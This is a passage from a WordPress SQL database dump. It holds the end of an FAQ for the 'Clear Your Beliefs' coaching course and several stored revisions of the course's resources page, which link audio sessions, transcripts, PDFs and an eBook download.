coach, you''ll work by phone or Skype at a time that''s most convenient to you.</p>\n\n<p>In addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.</p>\n\n<p><strong>Q: How long will I have access to the course?</strong></p>\n\n<p>A: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you''ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.</p>\n\n<p><strong>Q: Are there scholarships available?</strong></p>\n\n<p>A: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to <a href="mailto:info@clearyourbeliefs.com">info@clearyourbeliefs.com</a>, with a description of your circumstances and your offer of what you can pay.</p>\n\n<p><strong>Q: What is your refund policy?</strong></p>\n\n<p>A: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.</p>\n\n<p><strong>Q: How can I reach Customer Support?</strong></p>\n\n<p>A: Please send an email to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. We''ll get back to you within 48 hours (sometimes longer over weekends).</p>\n\n<p><strong>Q: What is your Privacy Policy?</strong></p>\n\n<p>A: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from <a href="http://www.ClearYourBeliefs.com" target="_blank">ClearYourBeliefs.com</a>, <a href="http://www.BeliefCloset.com" target="_blank">BeliefCloset.com</a>, or <a href="http://www.ConfusedAboutLove.com" target="_blank">ConfusedAboutLove.com.</a></p>\n\n<p>You may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.</p>\n\n<p>All information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.</p>\n\n<p>// </p>', 'Clear Your Beliefs Program', '', 'inherit', 'closed', 'open', '', '1941-revision-v1', '', '', '2015-02-06 02:54:55', '2015-02-06 07:54:55', '', 1941, 'http://clearyourbeliefs.com/1941-revision-v1', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(2087, 2, '2015-02-18 03:04:50', '2015-02-18 08:04:50', '<div style="margin-left:58px">\r\n<h1 style="text-align: center;">Thank You for Registering for\r\n<em>Clear Your Beliefs\r\n</em></h1>\r\n&nbsp;\r\n\r\nThis page contains all of the resources you need to take yourself through this breakthrough program.\r\n\r\nIf you are working with a <em>Clear Your Beliefs Coach</em>, he or she will instruct you on which audio to listen to, and how to follow up with them.\r\n\r\nDownload the "<strong>Course Guidebook</strong>" for suggestions on how to take yourself through the program, step-by-step.\r\n\r\nWelcome to Clear Your Beliefs!\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-signature.jpg"><img class="alignleft size-medium wp-image-256 no-shad" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-signature-300x70.jpg" alt="lion-signature" width="300" height="70" /></a>\r\n\r\n&nbsp;\r\n<h6>Lion Goodman\r\nFounder</h6>\r\n<h1></h1>\r\n<h1>The Guidebook</h1>\r\nDownload and read first:   <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/The-Clear-Your-Beliefs-Guidebook.pdf">The Clear Your Beliefs Guidebook</a>\r\n(Right-mouse-click and "Save As..." to your computer.\r\n<h1>Audio Recordings</h1>\r\n<span style="color: #800000;">[<strong>NOTE</strong>: To save any file to your computer, Right-click the link and "Save As," pointing to the folder where you want the file saved for later listening (the default is usually your Downloads folder). Or, click each link and listen (or read) any file on your browser now.]</span>\r\n\r\n<strong>Session 1: Pull All the Old Junk Out of Your BeliefCloset</strong>\r\n<a href="/wp-content/uploads/resources/Clear%20Your Beliefs-01.mp3">Clear Your Beliefs-01.mp3</a>\r\n\r\n<a href="/wp-content/uploads/resources/Clear%20Your Beliefs-02.mp3"><strong><span style="color: #000000;">Session 2:  Clear Your Negative Beliefs About Who You Are</span></strong>\r\nClear Your Beliefs-02.mp3</a>\r\n\r\n<a href="/wp-content/uploads/resources/Clear%20Your Beliefs-03.mp3"><strong><span style="color: #000000;">Session 3: Clear Your Limiting Beliefs About Your Capabilities</span></strong>\r\nClear Your Beliefs-03.mp3</a>\r\n\r\n<a href="/wp-content/uploads/resources/Clear%20Your Beliefs-04.mp3"><strong><span style="color: #000000;">Session 4: Clear Your Outdated Beliefs About Love &amp; Relationship</span></strong>\r\nClear Your Beliefs-04.mp3</a>\r\n\r\n<a href="/wp-content/uploads/resources/Clear%20Your Beliefs-05.mp3"><strong><span style="color: #000000;">Session 5: Clear Your Old Beliefs About Money and Work</span></strong>\r\nClear Your Beliefs-05.mp3</a>\r\n\r\n<a href="/wp-content/uploads/resources/Clear%20Your Beliefs-06.mp3"><strong><span style="color: #000000;">Session 6: Clear Uncomfortable Beliefs About Your Body &amp; Health</span></strong>\r\nClear Your Beliefs-06.mp3</a>\r\n\r\n<a href="/wp-content/uploads/resources/Clear%20Your Beliefs-07.mp3"><strong><span style="color: #000000;">Session 7: Clear Out the Rest of the Junk in Your BeliefCloset</span></strong>\r\nClear Your Beliefs-07.mp3</a>\r\n\r\n<strong>Bonus Call 1: Anodea Judith on Manifestating with Beliefs</strong>\r\n<a href="/wp-content/uploads/resources/Clear Your Beliefs-Bonus Call With Anodea Judith.mp3">Clear Your Beliefs-Bonus Call With Anodea Judith.mp3</a>\r\n\r\n<strong>Bonus Call 2: Carista Luminare on Love and Relationships</strong><a href="/wp-content/uploads/resources/Clear Your Beliefs-BonusCallWithCaristaLuminare.mp3">\r\nClear Your Beliefs-Bonus Call With Carista Luminare.mp3</a>\r\n<p style="text-align: center;">. . .</p>\r\n\r\n<h1><strong>Transcripts:</strong></h1>\r\n<strong>Session 1: Pull All the Old Junk Out of Your BeliefCloset</strong>\r\nPDF Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-1.pdf">CYB-1\r\n</a>\r\n<strong>Session 2:  Clear Your Negative Beliefs About Who You Are</strong>\r\nPDF Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-2.pdf">CYB-2</a>\r\n\r\n<strong>Session 3: Clear Your Limiting Beliefs About Your Capabilities</strong>\r\nPDF Download  <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-3.pdf">CYB-3</a>\r\n\r\n<strong>Session 4: Clear Your Outdated Beliefs About Love &amp; Relationship</strong>\r\nPDF Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-4.pdf">CYB-4</a>\r\n\r\n<strong>Session 5: Clear Your Old Beliefs About Money and Work</strong>\r\nPDF Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-5.pdf">CYB-5</a>\r\n\r\n<strong>Session 6: Clear Uncomfortable Beliefs About Your Body &amp; Health</strong>\r\nPDF Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-6.pdf">CYB-6</a>\r\n\r\n<strong>Session 7: Clear Out the Rest of the Junk in Your BeliefCloset</strong>\r\nPDF Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-7.pdf">CYB-7</a>\r\n\r\n<strong>Bonus Call: Carista Luminare, Ph.D.:  What Makes Love So Confusing?</strong>\r\nPDF Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-Bonus-1-CL.pdf">CYB Bonus 1 CL</a>\r\n\r\n<strong>Bonus Call: Anodea Judith, Ph.D: The Spiritual Technology of Manifesting</strong>\r\nPDF Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-Bonus-2-AJ.pdf">CYB Bonus 2 AJ</a>\r\n<p style="text-align: center;"> . . .</p>\r\n\r\n<h1>Bonus Materials:</h1>\r\n<strong>The Belief Self-Diagnosis Exercise:   (</strong>First read and do Part 1.  Then read and do Part 2.)\r\n\r\n<strong><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-Belief-Self-Diagnosis-Exercise-2014.pdf">CYB Belief Self-Diagnosis Exercise 2014</a>      (Part 1)</strong>\r\n\r\n<strong> <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-Belief-Self-Diagnosis-Exercise-2014.21.pdf">CYB Belief Self-Diagnosis Exercise 2014.2</a> (Part 2)</strong>\r\n<p style="text-align: center;">. . .</p>\r\n<strong>Take the LoveStyle Profile Quiz by clicking <a href="http://www.confusedaboutlove.com/the-lovestyles-profile/">HERE</a>.  Or paste this url into your browser:</strong>  www.ConfusedAboutLove.com/the-lovestyles-profile/\r\n<p style="text-align: center;">. . .</p>\r\n<strong>Download the multimedia eBook, "Transform Your Beliefs" by Lion Goodman, by clicking <a href="https://www.yousendit.com/download/TEhWM25NNnlVbStGa2NUQw">HERE</a>. </strong>  Or paste this url into your browser:  https://www.yousendit.com/download/TEhWM25NNnlVbStGa2NUQw\r\n\r\n[Note: You''ll be taken to a Hightail Download page.  Simply click on the "Download" button and your copy of the eBook will be downloaded into your computer.  It''s a big file, so be patient. You need Adobe Reader Version 9 or above to access all the materials. (Get the latest Adobe Reader <a href="http://get.adobe.com/reader/">HERE</a>.)  Once you''ve downloaded it, you''ll see embedded video and audio files that will play when you click on them. If they don''t play, click the link below each media, which will take you to the same file on the web (be sure you''re connected to the Internet).]\r\n<p style="text-align: center;">. . .</p>\r\n<p style="text-align: left;"><strong>Download and read the first two chapters</strong> of <em>Creating On Purpose: The Spiritual Technology of Manifesting Through the Chakras</em> by Anodea Judith and Lion Goodman.    PDF: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/Creating_On_Purpose_SampleChapters.pdf">Creating_On_Purpose_SampleChapters</a></p>\r\n&nbsp;\r\n</div>', 'Resources', '', 'inherit', 'closed', 'open', '', '139-revision-v1', '', '', '2015-02-18 03:04:50', '2015-02-18 08:04:50', '', 139, 'http://clearyourbeliefs.com/139-revision-v1', 0, 'revision', '', 0),
(2088, 2, '2015-02-18 03:06:01', '2015-02-18 08:06:01', '<div style="margin-left:26px">\r\n<h1 style="text-align: center;">Thank You for Registering for\r\n<em>Clear Your Beliefs\r\n</em></h1>\r\n&nbsp;\r\n\r\nThis page contains all of the resources you need to take yourself through this breakthrough program.\r\n\r\nIf you are working with a <em>Clear Your Beliefs Coach</em>, he or she will instruct you on which audio to listen to, and how to follow up with them.\r\n\r\nDownload the "<strong>Course Guidebook</strong>" for suggestions on how to take yourself through the program, step-by-step.\r\n\r\nWelcome to Clear Your Beliefs!\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-signature.jpg"><img class="alignleft size-medium wp-image-256 no-shad" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-signature-300x70.jpg" alt="lion-signature" width="300" height="70" /></a>\r\n\r\n&nbsp;\r\n<h6>Lion Goodman\r\nFounder</h6>\r\n<h1></h1>\r\n<h1>The Guidebook</h1>\r\nDownload and read first:   <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/The-Clear-Your-Beliefs-Guidebook.pdf">The Clear Your Beliefs Guidebook</a>\r\n(Right-mouse-click and "Save As..." to your computer.\r\n<h1>Audio Recordings</h1>\r\n<span style="color: #800000;">[<strong>NOTE</strong>: To save any file to your computer, Right-click the link and "Save As," pointing to the folder where you want the file saved for later listening (the default is usually your Downloads folder). Or, click each link and listen (or read) any file on your browser now.]</span>\r\n\r\n<strong>Session 1: Pull All the Old Junk Out of Your BeliefCloset</strong>\r\n<a href="/wp-content/uploads/resources/Clear%20Your Beliefs-01.mp3">Clear Your Beliefs-01.mp3</a>\r\n\r\n<a href="/wp-content/uploads/resources/Clear%20Your Beliefs-02.mp3"><strong><span style="color: #000000;">Session 2:  Clear Your Negative Beliefs About Who You Are</span></strong>\r\nClear Your Beliefs-02.mp3</a>\r\n\r\n<a href="/wp-content/uploads/resources/Clear%20Your Beliefs-03.mp3"><strong><span style="color: #000000;">Session 3: Clear Your Limiting Beliefs About Your Capabilities</span></strong>\r\nClear Your Beliefs-03.mp3</a>\r\n\r\n<a href="/wp-content/uploads/resources/Clear%20Your Beliefs-04.mp3"><strong><span style="color: #000000;">Session 4: Clear Your Outdated Beliefs About Love &amp; Relationship</span></strong>\r\nClear Your Beliefs-04.mp3</a>\r\n\r\n<a href="/wp-content/uploads/resources/Clear%20Your Beliefs-05.mp3"><strong><span style="color: #000000;">Session 5: Clear Your Old Beliefs About Money and Work</span></strong>\r\nClear Your Beliefs-05.mp3</a>\r\n\r\n<a href="/wp-content/uploads/resources/Clear%20Your Beliefs-06.mp3"><strong><span style="color: #000000;">Session 6: Clear Uncomfortable Beliefs About Your Body &amp; Health</span></strong>\r\nClear Your Beliefs-06.mp3</a>\r\n\r\n<a href="/wp-content/uploads/resources/Clear%20Your Beliefs-07.mp3"><strong><span style="color: #000000;">Session 7: Clear Out the Rest of the Junk in Your BeliefCloset</span></strong>\r\nClear Your Beliefs-07.mp3</a>\r\n\r\n<strong>Bonus Call 1: Anodea Judith on Manifestating with Beliefs</strong>\r\n<a href="/wp-content/uploads/resources/Clear Your Beliefs-Bonus Call With Anodea Judith.mp3">Clear Your Beliefs-Bonus Call With Anodea Judith.mp3</a>\r\n\r\n<strong>Bonus Call 2: Carista Luminare on Love and Relationships</strong><a href="/wp-content/uploads/resources/Clear Your Beliefs-BonusCallWithCaristaLuminare.mp3">\r\nClear Your Beliefs-Bonus Call With Carista Luminare.mp3</a>\r\n<p style="text-align: center;">. . .</p>\r\n\r\n<h1><strong>Transcripts:</strong></h1>\r\n<strong>Session 1: Pull All the Old Junk Out of Your BeliefCloset</strong>\r\nPDF Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-1.pdf">CYB-1\r\n</a>\r\n<strong>Session 2:  Clear Your Negative Beliefs About Who You Are</strong>\r\nPDF Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-2.pdf">CYB-2</a>\r\n\r\n<strong>Session 3: Clear Your Limiting Beliefs About Your Capabilities</strong>\r\nPDF Download  <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-3.pdf">CYB-3</a>\r\n\r\n<strong>Session 4: Clear Your Outdated Beliefs About Love &amp; Relationship</strong>\r\nPDF Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-4.pdf">CYB-4</a>\r\n\r\n<strong>Session 5: Clear Your Old Beliefs About Money and Work</strong>\r\nPDF Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-5.pdf">CYB-5</a>\r\n\r\n<strong>Session 6: Clear Uncomfortable Beliefs About Your Body &amp; Health</strong>\r\nPDF Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-6.pdf">CYB-6</a>\r\n\r\n<strong>Session 7: Clear Out the Rest of the Junk in Your BeliefCloset</strong>\r\nPDF Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-7.pdf">CYB-7</a>\r\n\r\n<strong>Bonus Call: Carista Luminare, Ph.D.:  What Makes Love So Confusing?</strong>\r\nPDF Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-Bonus-1-CL.pdf">CYB Bonus 1 CL</a>\r\n\r\n<strong>Bonus Call: Anodea Judith, Ph.D: The Spiritual Technology of Manifesting</strong>\r\nPDF Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-Bonus-2-AJ.pdf">CYB Bonus 2 AJ</a>\r\n<p style="text-align: center;"> . . .</p>\r\n\r\n<h1>Bonus Materials:</h1>\r\n<strong>The Belief Self-Diagnosis Exercise:   (</strong>First read and do Part 1.  Then read and do Part 2.)\r\n\r\n<strong><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-Belief-Self-Diagnosis-Exercise-2014.pdf">CYB Belief Self-Diagnosis Exercise 2014</a>      (Part 1)</strong>\r\n\r\n<strong> <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-Belief-Self-Diagnosis-Exercise-2014.21.pdf">CYB Belief Self-Diagnosis Exercise 2014.2</a> (Part 2)</strong>\r\n<p style="text-align: center;">. . .</p>\r\n<strong>Take the LoveStyle Profile Quiz by clicking <a href="http://www.confusedaboutlove.com/the-lovestyles-profile/">HERE</a>.  Or paste this url into your browser:</strong>  www.ConfusedAboutLove.com/the-lovestyles-profile/\r\n<p style="text-align: center;">. . .</p>\r\n<strong>Download the multimedia eBook, "Transform Your Beliefs" by Lion Goodman, by clicking <a href="https://www.yousendit.com/download/TEhWM25NNnlVbStGa2NUQw">HERE</a>. </strong>  Or paste this url into your browser:  https://www.yousendit.com/download/TEhWM25NNnlVbStGa2NUQw\r\n\r\n[Note: You''ll be taken to a Hightail Download page.  Simply click on the "Download" button and your copy of the eBook will be downloaded into your computer.  It''s a big file, so be patient. You need Adobe Reader Version 9 or above to access all the materials. (Get the latest Adobe Reader <a href="http://get.adobe.com/reader/">HERE</a>.)  Once you''ve downloaded it, you''ll see embedded video and audio files that will play when you click on them. If they don''t play, click the link below each media, which will take you to the same file on the web (be sure you''re connected to the Internet).]\r\n<p style="text-align: center;">. . .</p>\r\n<p style="text-align: left;"><strong>Download and read the first two chapters</strong> of <em>Creating On Purpose: The Spiritual Technology of Manifesting Through the Chakras</em> by Anodea Judith and Lion Goodman.    PDF: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/Creating_On_Purpose_SampleChapters.pdf">Creating_On_Purpose_SampleChapters</a></p>\r\n&nbsp;\r\n</div>', 'Resources', '', 'inherit', 'closed', 'open', '', '139-revision-v1', '', '', '2015-02-18 03:06:01', '2015-02-18 08:06:01', '', 139, 'http://clearyourbeliefs.com/139-revision-v1', 0, 'revision', '', 0),
(2090, 2, '2015-02-18 03:10:36', '2015-02-18 08:10:36', '<h1 style="text-align: center;">Thank You for Registering for\r\n<em>Clear Your Beliefs\r\n</em></h1>\r\n&nbsp;\r\n\r\nThis page contains all of the resources you need to take yourself through this breakthrough program.\r\n\r\nIf you are working with a <em>Clear Your Beliefs Coach</em>, he or she will instruct you on which audio to listen to, and how to follow up with them.\r\n\r\nDownload the "<strong>Course Guidebook</strong>" for suggestions on how to take yourself through the program, step-by-step.\r\n\r\nWelcome to Clear Your Beliefs!\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-signature.jpg"><img class="alignleft size-medium wp-image-256 no-shad" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-signature-300x70.jpg" alt="lion-signature" width="300" height="70" /></a>\r\n\r\n&nbsp;\r\n<h6>Lion Goodman\r\nFounder</h6>\r\n<h1></h1>\r\n<h1>The Guidebook</h1>\r\nDownload and read first:   <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/The-Clear-Your-Beliefs-Guidebook.pdf">The Clear Your Beliefs Guidebook</a>\r\n(Right-mouse-click and "Save As..." to your computer.\r\n<h1>Audio Recordings</h1>\r\n<span style="color: #800000;">[<strong>NOTE</strong>: To save any file to your computer, Right-click the link and "Save As," pointing to the folder where you want the file saved for later listening (the default is usually your Downloads folder). Or, click each link and listen (or read) any file on your browser now.]</span>\r\n\r\n<strong>Session 1: Pull All the Old Junk Out of Your BeliefCloset</strong>\r\n<a href="/wp-content/uploads/resources/Clear%20Your Beliefs-01.mp3">Clear Your Beliefs-01.mp3</a>\r\n\r\n<a href="/wp-content/uploads/resources/Clear%20Your Beliefs-02.mp3"><strong><span style="color: #000000;">Session 2:  Clear Your Negative Beliefs About Who You Are</span></strong>\r\nClear Your Beliefs-02.mp3</a>\r\n\r\n<a href="/wp-content/uploads/resources/Clear%20Your Beliefs-03.mp3"><strong><span style="color: #000000;">Session 3: Clear Your Limiting Beliefs About Your Capabilities</span></strong>\r\nClear Your Beliefs-03.mp3</a>\r\n\r\n<a href="/wp-content/uploads/resources/Clear%20Your Beliefs-04.mp3"><strong><span style="color: #000000;">Session 4: Clear Your Outdated Beliefs About Love &amp; Relationship</span></strong>\r\nClear Your Beliefs-04.mp3</a>\r\n\r\n<a href="/wp-content/uploads/resources/Clear%20Your Beliefs-05.mp3"><strong><span style="color: #000000;">Session 5: Clear Your Old Beliefs About Money and Work</span></strong>\r\nClear Your Beliefs-05.mp3</a>\r\n\r\n<a href="/wp-content/uploads/resources/Clear%20Your Beliefs-06.mp3"><strong><span style="color: #000000;">Session 6: Clear Uncomfortable Beliefs About Your Body &amp; Health</span></strong>\r\nClear Your Beliefs-06.mp3</a>\r\n\r\n<a href="/wp-content/uploads/resources/Clear%20Your Beliefs-07.mp3"><strong><span style="color: #000000;">Session 7: Clear Out the Rest of the Junk in Your BeliefCloset</span></strong>\r\nClear Your Beliefs-07.mp3</a>\r\n\r\n<strong>Bonus Call 1: Anodea Judith on Manifestating with Beliefs</strong>\r\n<a href="/wp-content/uploads/resources/Clear Your Beliefs-Bonus Call With Anodea Judith.mp3">Clear Your Beliefs-Bonus Call With Anodea Judith.mp3</a>\r\n\r\n<strong>Bonus Call 2: Carista Luminare on Love and Relationships</strong><a href="/wp-content/uploads/resources/Clear Your Beliefs-BonusCallWithCaristaLuminare.mp3">\r\nClear Your Beliefs-Bonus Call With Carista Luminare.mp3</a>\r\n<p style="text-align: center;">. . .</p>\r\n\r\n<h1><strong>Transcripts:</strong></h1>\r\n<strong>Session 1: Pull All the Old Junk Out of Your BeliefCloset</strong>\r\nPDF Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-1.pdf">CYB-1\r\n</a>\r\n<strong>Session 2:  Clear Your Negative Beliefs About Who You Are</strong>\r\nPDF Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-2.pdf">CYB-2</a>\r\n\r\n<strong>Session 3: Clear Your Limiting Beliefs About Your Capabilities</strong>\r\nPDF Download  <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-3.pdf">CYB-3</a>\r\n\r\n<strong>Session 4: Clear Your Outdated Beliefs About Love &amp; Relationship</strong>\r\nPDF Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-4.pdf">CYB-4</a>\r\n\r\n<strong>Session 5: Clear Your Old Beliefs About Money and Work</strong>\r\nPDF Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-5.pdf">CYB-5</a>\r\n\r\n<strong>Session 6: Clear Uncomfortable Beliefs About Your Body &amp; Health</strong>\r\nPDF Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-6.pdf">CYB-6</a>\r\n\r\n<strong>Session 7: Clear Out the Rest of the Junk in Your BeliefCloset</strong>\r\nPDF Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-7.pdf">CYB-7</a>\r\n\r\n<strong>Bonus Call: Carista Luminare, Ph.D.:  What Makes Love So Confusing?</strong>\r\nPDF Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-Bonus-1-CL.pdf">CYB Bonus 1 CL</a>\r\n\r\n<strong>Bonus Call: Anodea Judith, Ph.D: The Spiritual Technology of Manifesting</strong>\r\nPDF Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-Bonus-2-AJ.pdf">CYB Bonus 2 AJ</a>\r\n<p style="text-align: center;"> . . .</p>\r\n\r\n<h1>Bonus Materials:</h1>\r\n<strong>The Belief Self-Diagnosis Exercise:   (</strong>First read and do Part 1.  Then read and do Part 2.)\r\n\r\n<strong><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-Belief-Self-Diagnosis-Exercise-2014.pdf">CYB Belief Self-Diagnosis Exercise 2014</a>      (Part 1)</strong>\r\n\r\n<strong> <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-Belief-Self-Diagnosis-Exercise-2014.21.pdf">CYB Belief Self-Diagnosis Exercise 2014.2</a> (Part 2)</strong>\r\n<p style="text-align: center;">. . .</p>\r\n<strong>Take the LoveStyle Profile Quiz by clicking <a href="http://www.confusedaboutlove.com/the-lovestyles-profile/">HERE</a>.  Or paste this url into your browser:</strong>  www.ConfusedAboutLove.com/the-lovestyles-profile/\r\n<p style="text-align: center;">. . .</p>\r\n<strong>Download the multimedia eBook, "Transform Your Beliefs" by Lion Goodman, by clicking <a href="https://www.yousendit.com/download/TEhWM25NNnlVbStGa2NUQw">HERE</a>. </strong>  Or paste this url into your browser:  https://www.yousendit.com/download/TEhWM25NNnlVbStGa2NUQw\r\n\r\n[Note: You''ll be taken to a Hightail Download page.  Simply click on the "Download" button and your copy of the eBook will be downloaded into your computer.  It''s a big file, so be patient. You need Adobe Reader Version 9 or above to access all the materials. (Get the latest Adobe Reader <a href="http://get.adobe.com/reader/">HERE</a>.)  Once you''ve downloaded it, you''ll see embedded video and audio files that will play when you click on them. If they don''t play, click the link below each media, which will take you to the same file on the web (be sure you''re connected to the Internet).]\r\n<p style="text-align: center;">. . .</p>\r\n<p style="text-align: left;"><strong>Download and read the first two chapters</strong> of <em>Creating On Purpose: The Spiritual Technology of Manifesting Through the Chakras</em> by Anodea Judith and Lion Goodman.    PDF: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/Creating_On_Purpose_SampleChapters.pdf">Creating_On_Purpose_SampleChapters</a></p>\r\n&nbsp;', 'Resources', '', 'inherit', 'closed', 'open', '', '139-revision-v1', '', '', '2015-02-18 03:10:36', '2015-02-18 08:10:36', '', 139, 'http://clearyourbeliefs.com/139-revision-v1', 0, 'revision', '', 0),
(2089, 2, '2015-02-18 03:07:53', '2015-02-18 08:07:53', '<div style="margin-left:26px;width:900px;">\r\n<h1 style="text-align: center;">Thank You for Registering for\r\n<em>Clear Your Beliefs\r\n</em></h1>\r\n&nbsp;\r\n\r\nThis page contains all of the resources you need to take yourself through this breakthrough program.\r\n\r\nIf you are working with a <em>Clear Your Beliefs Coach</em>, he or she will instruct you on which audio to listen to, and how to follow up with them.\r\n\r\nDownload the "<strong>Course Guidebook</strong>" for suggestions on how to take yourself through the program, step-by-step.\r\n\r\nWelcome to Clear Your Beliefs!\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-signature.jpg"><img class="alignleft size-medium wp-image-256 no-shad" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-signature-300x70.jpg" alt="lion-signature" width="300" height="70" /></a>\r\n\r\n&nbsp;\r\n<h6>Lion Goodman\r\nFounder</h6>\r\n<h1></h1>\r\n<h1>The Guidebook</h1>\r\nDownload and read first:   <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/The-Clear-Your-Beliefs-Guidebook.pdf">The Clear Your Beliefs Guidebook</a>\r\n(Right-mouse-click and "Save As..." to your computer.\r\n<h1>Audio Recordings</h1>\r\n<span style="color: #800000;">[<strong>NOTE</strong>: To save any file to your computer, Right-click the link and "Save As," pointing to the folder where you want the file saved for later listening (the default is usually your Downloads folder). Or, click each link and listen (or read) any file on your browser now.]</span>\r\n\r\n<strong>Session 1: Pull All the Old Junk Out of Your BeliefCloset</strong>\r\n<a href="/wp-content/uploads/resources/Clear%20Your Beliefs-01.mp3">Clear Your Beliefs-01.mp3</a>\r\n\r\n<a href="/wp-content/uploads/resources/Clear%20Your Beliefs-02.mp3"><strong><span style="color: #000000;">Session 2:  Clear Your Negative Beliefs About Who You Are</span></strong>\r\nClear Your Beliefs-02.mp3</a>\r\n\r\n<a href="/wp-content/uploads/resources/Clear%20Your Beliefs-03.mp3"><strong><span style="color: #000000;">Session 3: Clear Your Limiting Beliefs About Your Capabilities</span></strong>\r\nClear Your Beliefs-03.mp3</a>\r\n\r\n<a href="/wp-content/uploads/resources/Clear%20Your Beliefs-04.mp3"><strong><span style="color: #000000;">Session 4: Clear Your Outdated Beliefs About Love &amp; Relationship</span></strong>\r\nClear Your Beliefs-04.mp3</a>\r\n\r\n<a href="/wp-content/uploads/resources/Clear%20Your Beliefs-05.mp3"><strong><span style="color: #000000;">Session 5: Clear Your Old Beliefs About Money and Work</span></strong>\r\nClear Your Beliefs-05.mp3</a>\r\n\r\n<a href="/wp-content/uploads/resources/Clear%20Your Beliefs-06.mp3"><strong><span style="color: #000000;">Session 6: Clear Uncomfortable Beliefs About Your Body &amp; Health</span></strong>\r\nClear Your Beliefs-06.mp3</a>\r\n\r\n<a href="/wp-content/uploads/resources/Clear%20Your Beliefs-07.mp3"><strong><span style="color: #000000;">Session 7: Clear Out the Rest of the Junk in Your BeliefCloset</span></strong>\r\nClear Your Beliefs-07.mp3</a>\r\n\r\n<strong>Bonus Call 1: Anodea Judith on Manifestating with Beliefs</strong>\r\n<a href="/wp-content/uploads/resources/Clear Your Beliefs-Bonus Call With Anodea Judith.mp3">Clear Your Beliefs-Bonus Call With Anodea Judith.mp3</a>\r\n\r\n<strong>Bonus Call 2: Carista Luminare on Love and Relationships</strong><a href="/wp-content/uploads/resources/Clear Your Beliefs-BonusCallWithCaristaLuminare.mp3">\r\nClear Your Beliefs-Bonus Call With Carista 